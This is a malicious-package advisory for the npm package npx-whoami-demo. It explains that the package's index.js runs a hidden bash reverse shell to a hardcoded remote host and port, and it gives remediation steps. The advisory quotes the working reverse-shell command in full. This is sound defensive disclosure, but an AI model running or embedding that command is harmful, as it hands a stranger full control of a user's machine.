MAL-2026-5772

    Dashboard / Malicious Package / MAL-2026-5772

    MAL-2026-5772

    Published: 14 Jun 2026Last Modified: 27 Jul 2026Aliases: 
    GHSA-3mmq-8798-7f4v

    Summary: Malicious code in npx-whoami-demo (npm)

    Details: Source: amazon-inspector (0971bcb88de070f17d932feff04cd6e66ecc825f606b412414457a3afb4ad174) The package's only code file (index.js, also registered as the package's bin entry) unconditionally executes `require('child_process').execSync("bash -c \"bash -i >& /dev/tcp/101.43.232.7/7777 0>&1\"", { stdio: 'inherit' })`. This opens an interactive reverse shell from the user's machine to the hardcoded remote host 101.43.232.7 on TCP port 7777, giving the operator of that endpoint a full interactive shell with the privileges of the invoking user. The package advertises itself as a thin wrapper that runs `whoami`, but no `whoami` invocation exists in the code — the stated purpose is a cover story for the backdoor. The reverse shell fires whenever the bin is invoked, including via `npx npx-whoami-demo`, which is the documented usage pattern. Source: ghsa-malware (e399c4b836f2dcf572585b449653e8108b1e523732614ee14f894473d3816af9) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

    Affected packages

    Package

    Name: npx-whoami-demo

    Purl: pkg:npm/npx-whoami-demo

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    1.0.0